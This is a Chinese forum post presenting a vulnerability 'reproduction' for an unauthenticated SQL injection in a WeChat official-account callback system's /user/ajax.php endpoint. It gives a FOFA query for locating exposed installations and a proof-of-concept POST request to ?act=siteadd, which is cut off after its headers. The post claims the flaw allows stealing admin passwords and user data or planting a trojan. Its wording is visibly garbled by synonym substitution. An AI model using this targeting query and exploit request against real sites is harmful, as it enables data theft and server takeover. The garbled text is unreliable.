微信公众平台无穷回调体系 /user/ajax.php SQL注入毛病复现 ...

十念  金牌会员 | 2024-7-18 23:01:43 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 680|帖子 680|积分 2040

0x01 产物简介

微信公众平台无穷回调体系是一种旨在提升企业客户服务体验和运营效率的工具。该体系通过一系列智能化和主动化的功能,资助企业与用户之间建立更加便捷、高效的沟通桥梁。
0x02 毛病概述

微信公众平台无穷回调体系 /user/ajax.php 接口存在SQL注入毛病,未经身份验证的长途攻击者除了可以利用 SQL 注入毛病获取数据库中的信息(比方,管理员背景暗码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器体系权限。
0x03 复现环境

FOFA:body="mb-5 web-font-desc"

0x04 毛病复现

PoC
  1. POST /user/ajax.php?act=siteadd HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
  4. Content-Type: application/x-www-form-urlencoded
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  6. Accept-Encoding: gzip, deflat
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

十念

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表